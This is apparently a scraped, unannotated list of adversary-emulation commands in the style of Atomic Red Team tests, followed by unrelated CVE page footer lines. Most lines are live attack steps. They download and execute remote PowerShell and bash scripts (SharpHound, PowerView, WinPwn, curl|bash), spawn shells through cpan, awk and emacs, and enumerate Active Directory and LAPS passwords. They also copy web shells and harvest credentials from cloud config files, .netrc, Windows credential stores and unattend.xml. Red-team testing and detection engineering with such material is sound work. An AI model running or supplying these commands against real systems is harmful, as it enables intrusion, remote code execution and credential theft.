IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.